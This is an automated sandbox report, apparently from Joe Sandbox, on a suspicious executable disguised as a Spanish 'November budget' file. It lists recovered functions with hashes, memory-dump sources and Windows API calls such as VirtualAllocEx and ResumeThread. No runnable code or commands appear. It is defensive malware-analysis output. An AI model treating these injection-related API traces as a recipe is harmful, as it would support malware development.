Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4da43dd293f61c6d9c284a8b5a4c582c88d53f583c97696f6758ef34eab737a9
Instruction ID: d8248fe872d08f934b8e29745050e97fee0f8ab50e7bbab218e636a41491e66a
Opcode Fuzzy Hash: 4da43dd293f61c6d9c284a8b5a4c582c88d53f583c97696f6758ef34eab737a9
Instruction Fuzzy Hash: 2F1156B1D002499FDB10DFAAC844BDFBFF5AF48320F20881AE519A7250C779A944CFA0

Function 0781D458 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0781D4C6

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0435209dc14c0fe6f9e559ea2cd367121b3c20a936071f2f79f2f872d957a916
Instruction ID: 5e09a05dd7a1dd4296b43768b47bfb5d6a02557b81c3e5edbe10a3e0d9aab56c
Opcode Fuzzy Hash: 0435209dc14c0fe6f9e559ea2cd367121b3c20a936071f2f79f2f872d957a916
Instruction Fuzzy Hash: 171137B19002499FCB10DFAAD845BDFBFF9EF48320F108819E519A7250C775A944CFA0

Function 0781CE91 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0781CEFA

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 7ec29d08e6942ed5e323ba2ca5c78f96cd7d66be889aa6fa8065cf85afbf409c
Instruction ID: e8f42c0f4326b338217b79446673834deb55aa058f23841b92adb73a37c93899
Opcode Fuzzy Hash: 7ec29d08e6942ed5e323ba2ca5c78f96cd7d66be889aa6fa8065cf85afbf409c
Instruction Fuzzy Hash: 9D1158B1D003498FCB20DFAAD4457DEFBF8EB88320F20841AD519A7240CB756944CFA5

Function 0781CE98 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 0781CEFA

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f932f4bf71c8163e4f69019b4d7f033f35a8417041b246990cc9a8dbc86433e2
Instruction ID: 4b0be7e2a236f706c6843441365434b617098cf077ed415fdc0dc452de31f352
Opcode Fuzzy Hash: f932f4bf71c8163e4f69019b4d7f033f35a8417041b246990cc9a8dbc86433e2
Instruction Fuzzy Hash: ED113AB1D003498FCB20DFAAC4457DEFBF9AB88324F208419D519A7250C7756944CFA4

Function 0781B4B0 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0781FED5

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 6da70b1f7ef7c75de5a1f978b6d9cdb32059a046b2e457ad4c23575c08ed4148
Instruction ID: 6919ddf12c4ae126de1355de2669df55ac33668edf95cb264d2e53d1fc19ac4d
Opcode Fuzzy Hash: 6da70b1f7ef7c75de5a1f978b6d9cdb32059a046b2e457ad4c23575c08ed4148
Instruction Fuzzy Hash: C511F5B58003499FCB10DF99D444BDEBBF8EB58310F108419E518A7201C375A944CFA1

Function 0781FE70 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0781FED5

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a7b0fdd9bb1454d4aeac6f87f1b983ad5dcf7593be837fcf4cef1a8f698ab963
Instruction ID: e66da8c625aeda9d89f9a678fd1b032ed14ae3194b1e1e2b04fc9258c7adb624
Opcode Fuzzy Hash: a7b0fdd9bb1454d4aeac6f87f1b983ad5dcf7593be837fcf4cef1a8f698ab963
Instruction Fuzzy Hash: 441103B58007499FDB10DF99D845BDFBFF8EB58320F10841AD918A7241C375A984CFA1

Function 0150B538 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0150B59E

Memory Dump Source

Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 28e0765b3d75a7fb1e9f5a2a1b358f969b012a19c1231386d2b59916598e986e
Instruction ID: 779e216fe1a01ca48cc0e10d5e8adfccadedb18f471eadf9979af92a2363c1dc
Opcode Fuzzy Hash: 28e0765b3d75a7fb1e9f5a2a1b358f969b012a19c1231386d2b59916598e986e
Instruction Fuzzy Hash: B41110B5C003498FDB10CF9AD444ADEFBF4AB88310F14845AD828B7250D375A545CFA1

Function 0122D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b62d47f63343302360e82398a702132b2640ec8c963d1e5f4933c071f5fce7e9
Instruction ID: 0800f3a7fb31dfb957e62dbc7d6e5c9701c9f594110824976ea95737b12669fc
Opcode Fuzzy Hash: b62d47f63343302360e82398a702132b2640ec8c963d1e5f4933c071f5fce7e9
Instruction Fuzzy Hash: 61216771514248EFDB01DF58E9C0F2ABF65FB88318F20C569E9090B256C3B6E466CBA1

Function 0122D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 179c1a411ee56cbb446c2c146d1c4d1c71f9dd289fd693f5c9d906bfcfa748c3
Instruction ID: c91efaa596c96ed5ad159360eb664bc808e3dd43852a9e812ba35c038d215d05
Opcode Fuzzy Hash: 179c1a411ee56cbb446c2c146d1c4d1c71f9dd289fd693f5c9d906bfcfa748c3
Instruction Fuzzy Hash: F0216A75514208EFDB05DF48C9C0B5ABF65FB88314F20C16DE9090B25AC376E446CBA1

Function 0123D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312754416.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_123d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bda984633548c6481348f1ba184efbab87fb471fa0a0bbaba15aa1f4b40c343
Instruction ID: b7f3f3e25e89bdef193479b1a893c00ec4b56674e6a67dccba2800bdbb5f2da0
Opcode Fuzzy Hash: 9bda984633548c6481348f1ba184efbab87fb471fa0a0bbaba15aa1f4b40c343
Instruction Fuzzy Hash: 5E2149B1524208DFDB01DF98C5C0B26BB65FBC4324F60C56DE9494B257C376D406CA61

Function 0123D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312754416.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_123d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0daa981f6f0fafbd4f5b16948392b88837e59273310fd20131b0d72c56f0fcf3
Instruction ID: 8c6888cc06d6bdcdfbaee5b76a7449c4b43e599985f81efc53a5eec97fe0c373
Opcode Fuzzy Hash: 0daa981f6f0fafbd4f5b16948392b88837e59273310fd20131b0d72c56f0fcf3
Instruction Fuzzy Hash: 9F2130B0614208DFCB11CFA8D980B26FB65EB88B14F60C569E90A0B256C37AD406CA61

Function 0123D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312754416.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_123d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b9cdc1c238059e941d455d93a932b3f73bd1a2597ed35516979e3dd9edccf68
Instruction ID: eab3d03f96f207c6e4e48aac76daded34f3f8cde3bd609fe564a9f78c3d98d14
Opcode Fuzzy Hash: 5b9cdc1c238059e941d455d93a932b3f73bd1a2597ed35516979e3dd9edccf68
Instruction Fuzzy Hash: AA21B3714083849FCB02CF64D994711BF71EB86314F28C5DAD9498F2A7C33AD80ACB62

Function 0122D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction ID: 40e3136a6dfc195517fa30c25a1fffe7a659018c6b8dd7d22726b789320d3739
Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction Fuzzy Hash: C3110376404284DFDB12CF54D5C4B1ABF71FB84314F24C6A9E9090B257C33AD46ACBA1

Function 0122D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction ID: bb5dd91affe23deee0a787c3709203da62b65301305e1dbf128b10804c6f93fe
Opcode Fuzzy Hash: b6d9f8954513a289108155b17418e8e788e8b427863a5550f59da745f4ae8560
Instruction Fuzzy Hash: 72110376404284DFDB12CF44D9C4B5ABF71FB84324F24C2A9D9090B257C33AE45ACBA1

Function 0123D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312754416.000000000123D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0123D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_123d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
Instruction ID: c47cbf8a465e67f2cf629255a892f6b3ea69edf5cec6afa285ef4cd64f099c9a
Opcode Fuzzy Hash: a3be7094ea246a7cddba5200c6ce82fad2e7d53e3ec886449491685f026f1607
Instruction Fuzzy Hash: DB11BBB5504284DFDB02CF54C5C4B15BBA1FB84224F24C6A9E9494B297C33AD40ACB61

Function 0122D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782e286bd6a22226a029bef965c4cf89a8697563a85051ef5b4e98cc6092ec50
Instruction ID: 86ff9d16c3009e211913c1a2b5bc552782a3ec3558af4d21d72dd2ff705b0ff6
Opcode Fuzzy Hash: 782e286bd6a22226a029bef965c4cf89a8697563a85051ef5b4e98cc6092ec50
Instruction Fuzzy Hash: 34012B71014398BAE7248F59CD84B6BBF9CDF41320F08C52AEE094A286D27D9800CAB1

Function 0122D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1312719010.000000000122D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0122D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_122d000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91fb9318844b58b70663671a2117f61f0e87bf027eab60b90ba41e197843215b
Instruction ID: 93870dfe0b19d98b0fbc10b036f9ee856b3f6626b7658efa9b3f6434a47c1752
Opcode Fuzzy Hash: 91fb9318844b58b70663671a2117f61f0e87bf027eab60b90ba41e197843215b
Instruction Fuzzy Hash: 62F09671404394AEE7258F1ACC88B66FF9CEF41734F18C45AEE485B286C27D9844CBB1

Non-executed Functions

Function 078130D0 Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9774ba22a0c447712b9c6f064159025318428ae7f702c519341de1a5a6dbf0
Instruction ID: 1f54d55b2de352115ddaf33574d581f000980984af73c61e5b23910ca2257c8c
Opcode Fuzzy Hash: de9774ba22a0c447712b9c6f064159025318428ae7f702c519341de1a5a6dbf0
Instruction Fuzzy Hash: 98E11AB4E102598FCB14DFA9C990AAEFBB6FF49304F24C169D414AB355DB30A941CFA1

Function 0781A758 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8ee3483b22af7498281c8f835ac5db21b279bdfa8e027cc5dcb1f90642bfca
Instruction ID: 1fd6d839ce8f211afe3ca16ec2cbdf0298f461e177b08b724863a9da7d87a737
Opcode Fuzzy Hash: fc8ee3483b22af7498281c8f835ac5db21b279bdfa8e027cc5dcb1f90642bfca
Instruction Fuzzy Hash: 29E119B4E012198FCB14DFA9C590AAEFBB6BF89304F24C169D415AB355D730AD42CFA1

Function 0781C670 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cb0455ca661ba8fe10f7a73f93d9157e6bcb2598f619675bc15bcfe9286ce51
Instruction ID: 98ec0b1699a0b4afaf550bb1a2c0aa700f5fcfc2726dc0539c2fe6e8eb4473c7
Opcode Fuzzy Hash: 9cb0455ca661ba8fe10f7a73f93d9157e6bcb2598f619675bc15bcfe9286ce51
Instruction Fuzzy Hash: 90E1F9B4E112198FCB14DFA9C590AAEFBB6FF89304F248169D415AB355D730AD42CF60

Function 0781C238 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 425442565507f9db588c0a2e933e951852d0f634da59baffea9a078bd8611fb8
Instruction ID: d435c5883833fe0303c453dfcfca0e4c23bedebdeeec26acb5105bb8b0bf42bc
Opcode Fuzzy Hash: 425442565507f9db588c0a2e933e951852d0f634da59baffea9a078bd8611fb8
Instruction Fuzzy Hash: 58E1F8B4E11219CFCB14DFA9C590AAEFBB6FF89304F248169D415AB355D730A942CFA0

Function 0781CF48 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2a9b3f4ac38269f06fae640c44b1f20d07dda1bda449ed1908691586e5b0f78
Instruction ID: 0be0fc3625946dfa92e0161b46aea8f3c03dcd7ab9fdb97866b02bcd65dffefa
Opcode Fuzzy Hash: b2a9b3f4ac38269f06fae640c44b1f20d07dda1bda449ed1908691586e5b0f78
Instruction Fuzzy Hash: A5E1F8B4E012198FCB14DFA9C590AAEFBF6FF89304F248169E415AB355D730A942CF60

Function 0781AB90 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2184e58b8fc3975776716712f8fb934f23280bfc7d1b551d9071c7661b6178fb
Instruction ID: 76b06139a3d1560d2100986742cb6503b2d321cc915fccc70593e55eac739238
Opcode Fuzzy Hash: 2184e58b8fc3975776716712f8fb934f23280bfc7d1b551d9071c7661b6178fb
Instruction Fuzzy Hash: B8E118B4E012198FCB14DFA9C590AAEFBB6BF89304F24C169E415AB355D730AD41CF61

Function 0150E134 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1313398111.0000000001500000.00000040.00000800.00020000.00000000.sdmp, Offset: 01500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1500000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f61159b5f3d681a8130a2ffc1a63063555e49e2183c4b3da0bc0f85b33c27fc
Instruction ID: 5aefaf34a7954c067ce5584af52631613b4bdb86f647499620c807218cf52436
Opcode Fuzzy Hash: 5f61159b5f3d681a8130a2ffc1a63063555e49e2183c4b3da0bc0f85b33c27fc
Instruction Fuzzy Hash: 6AA14E32E002168FCF2ADFA4C8445DEBBB2FFC5300B25496AE905AF295DB71D955CB80

Function 07813F88 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d29c9b2d927799297e0d9e95b247adcc12073408925eca5cf95334bd240222
Instruction ID: 720bcf53fc681c4d13ad14641cffde2e06cc9e7002b624637363f65f686f61b8
Opcode Fuzzy Hash: f2d29c9b2d927799297e0d9e95b247adcc12073408925eca5cf95334bd240222
Instruction Fuzzy Hash: 61717FB4E056198FCB04DFAAC98499EFBF2BF99300F24C166D819EB215D734A946CF50

Function 0781A713 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ee25c71f109ef550cf44c07dcf26fd0a9e08d6c8da10c7e6f393123d4c9bb91
Instruction ID: 222c5d304c2bde0d67fcdd2b59a1134cfb84e98ad5c7f251b007ea96ba627c60
Opcode Fuzzy Hash: 1ee25c71f109ef550cf44c07dcf26fd0a9e08d6c8da10c7e6f393123d4c9bb91
Instruction Fuzzy Hash: E95141B0E052198FDB14DFA9C9505AEFBF6BF89304F24C16AD408E7256D7349942CFA1

Function 0781C660 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afb5897f66814e074787b07cb68f0e7b986693da35f0e9118992a5dfec09ed77
Instruction ID: c83948e80fc37b30e99c65877bce67c94ee45c778825d8aff59e68ca09e63386
Opcode Fuzzy Hash: afb5897f66814e074787b07cb68f0e7b986693da35f0e9118992a5dfec09ed77
Instruction Fuzzy Hash: AD513AB0E012198FDB14DFA9C9805AEFBF6FF89304F24816AD418AB355D7309942CFA1

Function 07813CF0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0963b026591a46c354e177643d740594599a48cc44af2b13ec5eee5029839cfe
Instruction ID: feb11deeb16af048d9de1848de7b90c305a88f7ccc403898993e39e65be06672
Opcode Fuzzy Hash: 0963b026591a46c354e177643d740594599a48cc44af2b13ec5eee5029839cfe
Instruction Fuzzy Hash: 405180B5D046199FDB08CFEAC9846EEFBB6FF99300F10802AE419AB254DB345946CF40

Function 07813F77 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c7be7dc8a6dbef9514adbad6554043e210720fdaf20afe7a2a30e9ff43ffeb
Instruction ID: 15b9f3a60396a5e807e49915511597e7166d298e106991ae1ea8df2b097aac73
Opcode Fuzzy Hash: 44c7be7dc8a6dbef9514adbad6554043e210720fdaf20afe7a2a30e9ff43ffeb
Instruction Fuzzy Hash: D25181B5E046198FDB08CFAAC98469EFBF2BF89300F14C16AD419EB214DB349946CF50

Function 07813CEB Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1318051356.0000000007810000.00000040.00000800.00020000.00000000.sdmp, Offset: 07810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7810000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87039d60a8f3139cc35b4c27daa61c430630d0cf1d3b7e6b3a19aa22c8a5e320
Instruction ID: 7f779d5428511e2b93748cad781ef4da82bac1084c7bf002e2d530406124e293
Opcode Fuzzy Hash: 87039d60a8f3139cc35b4c27daa61c430630d0cf1d3b7e6b3a19aa22c8a5e320
Instruction Fuzzy Hash: 06417FB5E046199BDB08CFEAC9856EEFBF6AF88300F14C52AD419AB254DB345946CF40

Analysis Process: PRESUPUESTO DE NOVIEMBRE...exePID: 7336, Parent PID: 1388COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	17.4%
Total number of Nodes:	23
Total number of Limit Nodes:	0

Executed Functions

Function 03007118 Relevance: 6.6, Strings: 5, Instructions: 348
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o_q, xrefs: 0300753D
(o_q, xrefs: 03007220
(o_q, xrefs: 03007212
,cq, xrefs: 0300728A
,cq, xrefs: 03007298

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: (o_q$(o_q$(o_q$,cq$,cq
API String ID: 0-1313158517
Opcode ID: ebb1e55cdd26a74cbc2d0bea7d7fdfae116dd42889def6d1d40199165fe01e06
Instruction ID: 4d16a0ca2a8b190e51c749e7e2e4ff6acfbfaed97804957cbf68a8eff9acbab3
Opcode Fuzzy Hash: ebb1e55cdd26a74cbc2d0bea7d7fdfae116dd42889def6d1d40199165fe01e06
Instruction Fuzzy Hash: C5E14E30A02119DFEB54CFA9C884AADBBF6BF88701F598465E845AB3A1D734FD41CB50

Function 03009DE0 Relevance: 6.1, Strings: 4, Instructions: 1127COMMON

Download Yara Rule

Strings

4'_q, xrefs: 03009E04
(o_q, xrefs: 0300A518
4'_q, xrefs: 0300AB13
4'_q, xrefs: 03009F0C

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: (o_q$4'_q$4'_q$4'_q
API String ID: 0-2845777604
Opcode ID: 80b601abd0aaf719bfbabe838b2dee96305e0c99325bcad8304a25abb8291bd8
Instruction ID: 720169815f1c4e22386731a8bf69f5cfe27b15d7b1d18d4977bacca42f0cf318
Opcode Fuzzy Hash: 80b601abd0aaf719bfbabe838b2dee96305e0c99325bcad8304a25abb8291bd8
Instruction Fuzzy Hash: BFA27F74B012099FDB15CF68C984AAEBBF6FF88310F1985A9E405DB3A1D735E981CB50

Function 030029EC Relevance: 5.5, Strings: 4, Instructions: 487
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xcq, xrefs: 03002B57
Xcq, xrefs: 03002A9E
Xcq, xrefs: 03002BA4
Xcq, xrefs: 03002AD8

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: Xcq$Xcq$Xcq$Xcq
API String ID: 0-2577476577
Opcode ID: e39092584de3ba9971e63d176725761b188e97184d4e9a92edbd9f2d38559915
Instruction ID: f8d4c527433b5314d57e61029f1ef10eccc4cf530ed098acf3dc10aaf44ebcd4
Opcode Fuzzy Hash: e39092584de3ba9971e63d176725761b188e97184d4e9a92edbd9f2d38559915
Instruction Fuzzy Hash: F8028E3190E7E48FCB238B788CA039ABFF5AF4B204F0948D6C495DB29BD6285525C753

Function 0300C738 Relevance: 3.9, Strings: 3, Instructions: 152
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH_q, xrefs: 0300C98F
d, xrefs: 0300C739
PH_q, xrefs: 0300C9A0

Memory Dump Source

Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd

Similarity

API ID:
String ID: PH_q$PH_q$d
API String ID: 0-1909484465
Opcode ID: 150aa4e256766d7e51ba216dc2ef13ead076e9c6d90e72c993c00d4fee8e6570
Instruction ID: a7d9d3adf32e658ef4749adc1910a6ec6da0ae5c6f3b1a0e3a05930b7cba7082
Opcode Fuzzy Hash: 150aa4e256766d7e51ba216dc2ef13ead076e9c6d90e72c993c00d4fee8e6570
Instruction Fuzzy Hash: A361D474E016089FEB18DFAAD984A9DFBF2BF89300F14C169E818AB365DB345945CF50

Function 030069B0 Relevance: 3.1, Strings: 2, Instructions: 563
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hcq, xrefs: 03006DA6
